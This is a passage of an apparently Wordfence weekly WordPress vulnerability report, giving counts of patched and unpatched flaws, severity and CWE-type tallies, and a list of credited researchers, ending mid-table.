<p><em><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</em></p>
<hr>
<h3><a></a>New Firewall Rules Deployed Last Week</h3>
<p>The Wordfence Threat Intelligence Team reviews each vulnerability to determine impact and severity, along with assessing the likelihood of exploitation, to verify that the Wordfence Firewall provides sufficient protection.</p>
<p>The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers last week:</p>
<ul>
<li>WAF-RULE-952 – Data redacted while we work with the vendor on a patch.</li>
</ul>
<p>Wordfence <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers received this protection immediately, while users still running the free version of Wordfence will receive this enhanced protection after a 30 day delay.</p>
<hr>
<h3>Total Unpatched &amp; Patched Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table patched-status">
<tr>
<th class="text-center w-50">Patch Status</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Patched</td>
<td class="total text-center">166</td>
</tr>
<tr>
<td class="text-center">Unpatched</td>
<td class="total text-center">74</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CVSS Severity Last Week</h3>
</p>
<table class="wfvr-list-table cvss-counts">
<tr>
<th class="text-center w-50">Severity Rating</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Medium Severity</td>
<td class="total text-center">111</td>
</tr>
<tr>
<td class="text-center">High Severity</td>
<td class="total text-center">112</td>
</tr>
<tr>
<td class="text-center">Critical Severity</td>
<td class="total text-center">17</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CWE Type Last Week</h3>
</p>
<table class="wfvr-list-table cwe-counts">
<tr>
<th class="text-center w-50">Vulnerability Type by CWE</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>Improper Neutralization of Input During Web Page Generation (&#8216;Cross-site Scripting&#8217;)</td>
<td class="total text-center">73</td>
</tr>
<tr>
<td>Missing Authorization</td>
<td class="total text-center">42</td>
</tr>
<tr>
<td>Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)</td>
<td class="total text-center">27</td>
</tr>
<tr>
<td>Deserialization of Untrusted Data</td>
<td class="total text-center">14</td>
</tr>
<tr>
<td>Improper Privilege Management</td>
<td class="total text-center">12</td>
</tr>
<tr>
<td>Authorization Bypass Through User-Controlled Key</td>
<td class="total text-center">11</td>
</tr>
<tr>
<td>Improper Control of Filename for Include/Require Statement in PHP Program (&#8216;PHP Remote File Inclusion&#8217;)</td>
<td class="total text-center">11</td>
</tr>
<tr>
<td>Exposure of Sensitive Information to an Unauthorized Actor</td>
<td class="total text-center">10</td>
</tr>
<tr>
<td>Unrestricted Upload of File with Dangerous Type</td>
<td class="total text-center">10</td>
</tr>
<tr>
<td>Improper Control of Generation of Code (&#8216;Code Injection&#8217;)</td>
<td class="total text-center">8</td>
</tr>
<tr>
<td>Improper Limitation of a Pathname to a Restricted Directory (&#8216;Path Traversal&#8217;)</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>Cross-Site Request Forgery (CSRF)</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Improper Authentication</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>Client-Side Enforcement of Server-Side Security</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Server-Side Request Forgery (SSRF)</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Unverified Password Change</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Improper Authorization</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Input Validation</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Incorrect Authorization</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Incorrect Privilege Assignment</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Weak Password Recovery Mechanism for Forgotten Password</td>
<td class="total text-center">1</td>
</tr>
</table>
<hr>
<h3><a></a>Researchers That Contributed to WordPress Security Last Week</h3>
</p>
<table class="wfvr-list-table researcher-list">
<tr>
<th class="text-center w-50">Researcher Name</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a>
				</div>
</p></div>
</td>
<td class="total text-center">19</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a>
				</div>
</p></div>
</td>
<td class="total text-center">17</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a>
				</div>
</p></div>
</td>
<td class="total text-center">16</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a>
				</div>
</p></div>
</td>
<td class="total text-center">12</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a>
				</div>
</p></div>
</td>
<td class="total text-center">10</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f1f186a43626c61a7e05b5db4a89b87d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f1f186a43626c61a7e05b5db4a89b87d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asim-alshaya" target="_blank" rel="noopener">Asim Alshaya</a>
				</div>
</p></div>
</td>
<td class="total text-center">9</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a>
				</div>
</p></div>
</td>
<td class="total text-center">8</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0da320f0ff233e1fc5948be78c4a9693.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0da320f0ff233e1fc5948be78c4a9693"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov" target="_blank" rel="noopener">Farid Narimanov</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a>
				</div>
</p></div>
</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/34e8630d9d966b9be2ef1801165bedf1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="34e8630d9d966b9be2ef1801165bedf1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denver-jackson-2" target="_blank" rel="noopener">Denver Jackson</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f68b92d2360e69ed80348d13de97c4d0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f68b92d2360e69ed80348d13de97c4d0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener">João Pedro S Alcântara (Kinorth)</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/efd10eb3421a6ca0a3d855ad7029a801.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="efd10eb3421a6ca0a3d855ad7029a801"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener">V1T</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/355ce104d8d84334b00aeb894b98d99d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="355ce104d8d84334b00aeb894b98d99d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/20kilograma" target="_blank" rel="noopener">20kilograma</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4ee838051f5b349d62b3dc49551eb17c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ee838051f5b349d62b3dc49551eb17c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hivesec" target="_blank" rel="noopener">hivesec</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4498ddf94b5463ecd8bdfd24592da6a4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4498ddf94b5463ecd8bdfd24592da6a4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nh4tvd" target="_blank" rel="noopener">nh4tvd</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/da7c49ec64423fe639d209c7e2603c4b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da7c49ec64423fe639d209c7e2603c4b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/robert-moon" target="_blank" rel="noopener">hackthesoul</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c1848da8ace36e65db046cca318ee343.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c1848da8ace36e65db046cca318ee343"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener">Shivamani Vastrala</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truong-huu-phuc" target="_blank" rel="noopener">Trương Hữu Phúc</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cd0fc66ed35d563ddd76a2843e23fd05.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd0fc66ed35d563ddd76a2843e23fd05"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/van-phuc" target="_blank" rel="noopener">Van Phuc</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6850e6e9fde2fb4afa5c90fd6bb8b6c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6850e6e9fde2fb4afa5c90fd6bb8b6c9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener">Mohammed Abd Alrahman</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4a36854ce1b3d726839f26041f205bdd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4a36854ce1b3d726839f26041f205bdd"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sequence-x0" target="_blank" rel="noopener">sequence_X0</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener">Bonds</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d2778a23819a9ce528ff412cf1f5e72c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2778a23819a9ce528ff412cf1f5e72c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara" target="_blank" rel="noopener">João Pedro S Alcântara</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/79c0b14658426052f872fd8e16ab8459.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="79c0b14658426052f872fd8e16ab8459"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mokksh-parekh" target="_blank" rel="noopener">Mokksh Parekh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3331f826b98deefc61fd596574a03f71.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3331f826b98deefc61fd596574a03f71"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohamed-bassia" target="_blank" rel="noopener">Mohamed Bassia</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/26f3449f5fd6f5b863626494f64fdb7e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="26f3449f5fd6f5b863626494f64fdb7e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ezekiel-victor" target="_blank" rel="noopener">Ezekiel Victor</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8ec93bb7e5ec96ab4636699e413382c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8ec93bb7e5ec96ab4636699e413382c9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener">Tin Pham (TF1T)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5b69e7aafee24f8ccab8f74d57deb0f8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5b69e7aafee24f8ccab8f74d57deb0f8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ronnachai-sretawat-na-ayutaya-simonhaskelly" target="_blank" rel="noopener">Ronnachai Sretawat Na Ayutaya (Simonhaskelly)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ea364d1a9ca481cbc861b1318cc3cc64.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ea364d1a9ca481cbc861b1318cc3cc64"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ruwantha-harshamal" target="_blank" rel="noopener">Ruwantha Harshamal</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9fe3b597e2bbd23928882d43475fdeb9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9fe3b597e2bbd23928882d43475fdeb9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/timomangcut" target="_blank" rel="noopener">timomangcut</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6ab6f7ef1eb693380d3393108f4343f4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6ab6f7ef1eb693380d3393108f4343f4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jorg-steinstrater" target="_blank" rel="noopener">Jorgson</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/13e4fb57452a5afebd2ab91bf8a0bd52.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="13e4fb57452a5afebd2ab91bf8a0bd52"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ahmed-hassan-2" target="_blank" rel="noopener">Ahmed Hassan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f894d5600bcba5e947d6dde37a3cec1b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f894d5600bcba5e947d6dde37a3cec1b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/stealthcopter" target="_blank" rel="noopener">stealthcopter</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/68e8a7033141e73e2cf6863622c21485.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="68e8a7033141e73e2cf6863622c21485"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/deva-parekh" target="_blank" rel="noopener">Deva Parekh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ee3df505694b12524f5722a72a35112b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ee3df505694b12524f5722a72a35112b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rootdirectivesec" target="_blank" rel="noopener">rootdirective.sec</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1fcd4731afa8285a12c991cc8c7bdb09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1fcd4731afa8285a12c991cc8c7bdb09"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener">Taylsec</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2a1b4c1c638eb4f66b0677e71058a830.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2a1b4c1c638eb4f66b0677e71058a830"><br />
